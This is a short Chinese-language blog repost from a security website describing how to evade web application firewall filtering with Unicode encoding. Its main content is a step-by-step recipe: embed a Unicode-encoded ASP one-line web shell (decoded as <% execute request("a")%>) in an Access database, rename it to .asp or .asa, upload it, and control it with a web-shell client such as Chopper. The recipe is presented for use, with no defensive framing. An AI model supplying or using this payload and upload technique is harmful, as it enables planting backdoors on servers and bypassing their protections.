关注网络与数据安全

忘记密码
“游侠安全网”创建了网络安全从业者QQ大群(群号:389710688) ,欢迎各位同仁加入!有其它问题,请联系站长“网路游侠”,QQ:55984512


通过unicode躲开WEB防火墙过滤

2010-10-09 14:58 推荐: 浏览: 100字号:

摘要: 现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。 1.新建一个mdb2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp; (实际是...

现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,
比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。

1.新建一个mdb
2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
 (实际是<% execute request("a")%>)
3.改后缀为asp/asa
4.上传
5.一句话客户端或者菜刀连接

FROM http://hi.baidu.com/it_security/blog/item/976f6ddbbce719d5b6fd4882.html

联系站长租广告位!

中国首席信息安全官